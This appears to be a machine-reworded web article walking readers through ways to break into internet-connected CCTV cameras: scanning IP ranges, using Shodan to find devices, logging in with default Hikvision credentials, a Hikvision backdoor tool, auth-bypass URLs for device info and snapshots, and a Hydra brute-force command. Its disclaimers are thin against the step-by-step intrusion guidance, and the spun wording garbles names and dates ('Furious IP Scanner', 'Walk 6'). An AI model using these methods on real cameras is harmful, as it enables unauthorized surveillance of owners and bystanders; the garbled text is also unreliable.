Extra material about CCTV camera hacking
You can read the following articles for more details on CCTV camera hacking and personal safety measures:
- Ten hacker secrets for breaking into CCTV cameras
- DDoS attack used hacked CCTV cameras.
- Is the CCTV system you use secure from hackers?
- An attack on your CCTV system is imminent.
The methods to hack CCTV camera
There are many different ways to hack a CCTV camera; some are straightforward, some are a little more specialized, and some aren't hacking at all.
We should look into the following tactics:
1. Use a website that displays CCTV cameras that have been compromised
Although it isn't technically hacking, this method is the simplest. You just need to go to a website that hosts a lot of CCTV cameras that have been compromised and watch them.
These websites were developed by programmers who access IP CCTV cameras or DVRs (Computerized Video Recorders) and make the data freely available to you.
By doing this, by the end of the day, you are not hacking anything except for CCTV cameras that have already been compromised.
See below for an example of a website that displays such compromised CCTV cameras:
The website compiles CCTV camera hacks from all over the world and arranges them according to producers, nations, cities, and time zones.
See an example of real-time CCTV cameras installed in shopping centers below.
The website administrator asserts that by only displaying filtered cameras, no one's privacy will be respected because this is the largest directory of online surveillance security cameras in the world.
A notice on the home page states that if someone sends an email requesting it, the CCTV camera can be taken down from the website.
2. Hack CCTV camera using default passwords
That isn't exactly hacking either, but it does the trick. You only need to locate the CCTV camera online and try to use the default secret key; many devices on the Web still use a similar unique secret key from the factory.
The idea is to look through the IP camera manual in search of the factory-set secret phrase, which you can then use to break into the CCTV camera (or recorder).
How to find the IP camera on the Internet
Okay, so first you need to locate the CCTV cameras online. There are several ways to do this, but let's take a closer look at the primary method that makes use of an organization IP scanner to find internet-based IP devices.
I'll demonstrate how to use the Furious IP Scanner in this article to browse the Web and look for IP cameras and recorders (DVRs and NVRs).
STEP 1 - Get the Angry IP Scanner now.
Download the Angry IP scanner for Windows, Mac, or Linux, depending on your operating system.
Visit the website for Angry IP Scanner below. Verify that Java is installed on your computer and download the appropriate version.
STEP 2 - Download and run the Angry IP Scanner You only need to run the setup file and follow the instructions as displayed in the images below to complete the installation. Click image to enlarge
STEP 3 - Set the ports and fetcher for the Angry IP Scanner Configuring the Angry IP Scanner's fetchers and ports to display the correct data is necessary in order to find the data we need to hack IP cameras. For the configuration, see the image below.
Set up the most commonly used ports (80, 23, 8080, 8081, and 8082) so that people installing IP cameras can access them online.
Such fundamental knowledge is actually required to hack a CCTV camera.
Click on fetchers under tools to access the configuration window.
In order to display it on the software's home page, select the Web detect fetcher on the right side and click the arrow to move it to the left side.
STEP 4 - Determine the IP port range to check to begin with, it's crucial to locate a CCTV camera that is accessible online. Choose an IP address to check with the Furious IP scanner. See the filtered IP address range in the image below.
You can use an IP range from your country or a professional cooperative; in the example above, I used the range from xx.242.10.0 to xx.242.10.255. It should be noted that you can fill in the first IP range segment with /24 or /16, for example, to let the product determine your reach using 254 or 65.534 has separately.
Due to security concerns, only the last few outputs of the IP are displayed, but it is still possible to locate two online Hikvision DVRs on the Internet. I am aware of this because I can identify data from DNVRS-Networks on the Internet.
It is quite common to find a lot of IP cameras, DVRs, and NVRs linked to the Internet because the output should be possible for thousands of IP addresses.
You only need to right-click the IP camera or DVR you found online and choose to open it in an internet browser. very similar to what is shown in the picture below.
The device in question is a Hikvision DVR, so you can simply try using the default username and password, "admin/12345", which you can find in the Hikvision manual.
Under the login screen, take note of the maker's name (Hikvision). You occasionally see a well-known logo and sometimes small text that looks a lot like this.
Did you get the point? You only need a tool to search the Internet, an internet-connected device, and the default password you can find in the IP camera default password list or in the maker manual to hack a CCTV camera.
The DVR's image after being logged in with the credentials admin/12345 is shown below.
DVR hacked by Hikvision (click to enlarge)
The interaction also works with other brands as long as you can see the Internet Distinguish data and try to use the default administrator/secret word certifications to hack the CCTV camera. It's easier to demonstrate a model with this manufacturer (Hikvison) because there are many of their devices all over the world.
Hack CCTV camera process details
It's important to understand the interaction so you can defend yourself against programmers trying to access your IP surveillance camera. To learn more about how CCTV camera hacking works, just keep reading.
Diagram showing how CCTV camera hacking operates
As seen in the illustration below, the network scanner (Angry IP scanner) is used to gather data from the router connected to the Internet.
Diagram of CCTV camera hacking (click to enlarge)
Recognize that this interaction is normal; the switch doesn't have to keep the information a secret and will respond with a list of the services offered.
If we compare the interaction to a typical store, the owner doesn't hide the location or the services that are offered so that customers can visit and take advantage of them. Most likely, the owner won't make the key shop accessible to the general public.
3. Hack CCTV camera using shodan
This method of CCTV camera hacking is essentially the same as the last one, but you don't need to introduce a product to check the organization since this cycle has already been completed for you; all you need to do is try to use the login credentials.
Shodan is a tool for a website that includes security IP cameras, DVRs, and NVRs and displays Web devices from all over the world.
Shodan will display a ton of information, including the number of devices worldwide, the area, IP, and open ports, if you simply type the brand or maker name of an IP camera.
Examine the image below to see how much information is available.
In the example below, information is filtered by country (Brazil), and you can see the details, which include the number of cameras per city (Sao Paulo) and even the ISP provider (Vivo), if you sign up for a free account on the website.
Shodan displays information about the IP device.
If you click on the details link next to the IP device, a new window displaying all the details about the CCTV camera you want to hack will open.
Information about the device's owner and location
The specifics Windows displays the device IP as well as the company name.
information on the device ports
Every IP device on the Internet has an IP address, as we have already seen, and some services are also available by using specific ports. As seen in the image below, Shodan can display these data clearly.
You only need to use an Internet browser to type in the IP device IP address and port after seeing the details, then try to use the default client and secret phrase as shown earlier in this article. See the picture below.
I simply entered the IP address and port for this camera as follows: XX.226.219.250:88
You will actually want to log in by entering the default device secret key unless you are lucky and the IP camera (or DVR) secret phrase has never been changed.
4. Hack CCTV camera using exploit tool (software)
You must therefore use a CCTV camera exploit device because the default username and secret phrase for the camera have been changed by someone.
When an IP device has a security flaw, programmers can create exploit tools to automate the hacking process. With IP cameras, that additionally occurs.
The Hikvision IP camera security flaw
Hikvision IP cameras were found to have a security flaw in 2017 that allowed for direct access to device information like model, serial number, firmware version, and users.
On Walk 6, 2017, the problem was reported to Hikvision, which investigated it right away and acknowledged the existence of the disappointment.
Hikvision finally fixed the problem after five days, but cameras using the outdated firmware will still be defenseless against this security flaw.
How the IP camera exploit works
As another example, I'll talk about a product designed to exploit a security flaw in Hikvision IP cameras that are running outdated firmware.
The Hikvision IP camera exploit tool
To travel and hack CCTV cameras that are online on the Web or in your local organization, you simply need to run the Hikvision IP camera exploit on a PC or PC, as shown in the above description.
Download the exploit for the Hikvision Backdoor.
I strongly advise using this device on the Hikvision IP cameras you own or have permission to use for security tests because it is obvious that you want the IP camera data to be able to design the product appropriately.
How to prevent cctv camera hack
DISCLAIMER: Any of your demonstrations are not my responsibility. You wouldn't presume to hack a CCTV camera that is not near you. You can test your IP cameras with the Hikvision exploit tool to make sure the security flaw has been fixed by a firmware update. You've received a warning.
Okay, now that you understand you shouldn't assume you can hack other IP cameras, let's talk about the Hikvision exploit tool.
By obtaining the IP camera internal client list and creating a new secret key for one of them according to your choice, the endeavor can hack a CCTV camera.
Simply use the following methods to use the product:
1. Put the IP and port of the camera in
2. Choose "Get User List"
3. Pick the user whose password you want to change.
4. Enter a brand-new password and press the button.
After using these methods, all you need to do is enter the camera's IP address and port in a web browser and log in using the qualification you just created.
Can My Security Cameras Be Hacked?
Cameras that are susceptible to the security flaw
The Hikvision camera models impacted by this security flaw are listed below. Assuming you have one of them, simply update the firmware to fix the problem and prevent CCTV camera hacking.
5. Using a single command, compromise a CCTV camera
How to obtain information about an IP camera
Additionally, it is possible to hack a Hikvision camera by sending a specific order that retrieves the camera data or by making a screen effort. This problem affects models and firmware versions that are similar to those shown above.
If you enter the camera's IP address and port number along with the order below, you will see information about the camera, including its name, model, and firmware version.
System/deviceInfo?auth=YWRtaW46MTEK
The full command is thus:
<camera IP>:<camera port> System/deviceInfo?auth=YWRtaW46MTEK
The information is returned by the camera exactly as in the image below:
<DeviceInfo xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<deviceName>IP CAMERA</deviceName>
<deviceID>88</deviceID>
<deviceDescription>IPCamera</deviceDescription>
<deviceLocation>hangzhou</deviceLocation>
<systemContact>Hikvision.China</systemContact>
<model>DS-2CD2420F-IW</model>
<serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>
<macAddress>a4:14:37:xx:xx:xx</macAddress>
<firmwareVersion>V5.4.5</firmwareVersion>
<firmwareReleasedDate>build 170123</firmwareReleasedDate>
<bootVersion>V1.3.4</bootVersion>
<bootReleasedDate>100316</bootReleasedDate>
<hardwareVersion>0x0</hardwareVersion>
</DeviceInfo>
How to take a camera screenshot
It is possible to take a screen capture from an IP camera and see what is on the other side of a CCTV camera by simply issuing a similar command. It is a flaw in security.
For the command to obtain the IP camera screenshot, see below.
onvif-http/snapshot?auth=YWRtaW46MTEK
The full command is thus:
<camera IP>:<camera port> onvif-http/snapshot?auth=YWRtaW46MT
Disclaimer: The image shown above was taken by a Hikvision camera using an outdated firmware version, as was recently described in this article. The company has a solution for this problem, so the new models won't have these security flaws.
6. By using brute force, compromise a CCTV camera
Just imagine that the CCTV camera is using a code word that is based on a common word that can be found in a word reference, such as "god, home, secret," and so forth.
A person could easily hack a CCTV camera by trying a variety of passwords until they found the one that worked. That is a strategy that succeeds.
You may be thinking right now that this method is overly time-consuming and difficult because it is confusing to type any word that is available in a word reference in order to try to find the one that will work to log into the CCTV camera.
In fact, you can have a better chance of success if you delegate this task to a tool that can test hundreds or thousands of passwords every second.
Look at the graph below to see how this functions.
You only need to have your password file prepared with the words you want to use and issue the command to use Hydra on Linux or Windows.
hydra -s 88 -l admin -P /root/desktop/pass.txt -e ns <camera IP>
See below the syntax
-s 88 -- The IP camera's port number
-l admin -- The standard login name will be (admin).
-P /root/desktop/pass.txt -- Password list file you have
-e --- empty password
ns --- Try logging in with no password.
The program launches, starts attempting different words it has read from the text file, and keeps doing this until it finds a match. If the CCTV camera takes into account those quick attempts, it will only take a short while for the product to find the correct secret phrase.
Modern IP CCTV cameras prevent this kind of brutal power attack because they lock themselves out after too many failed login attempts.
Final words and conclusion
There are many ways to hack a CCTV camera, and each one requires at least a few basic skills from the attacker, who should be able to understand a little bit about the Web, how to use a computer, and programming.
Be cautious because there is no guarantee that any IP device connected to the Web is 100% secure and cannot be compromised by someone.
The purpose of this article is to help readers understand how a CCTV camera can be compromised and how to reduce the likelihood of an aggressor.
I used a model to illustrate what is possible, and the majority of programming techniques can be applied to a variety of devices.
Note: I do not endorse any CCTV camera manufacturer or brand, and I also advise against attempting to hack into another person's camera.
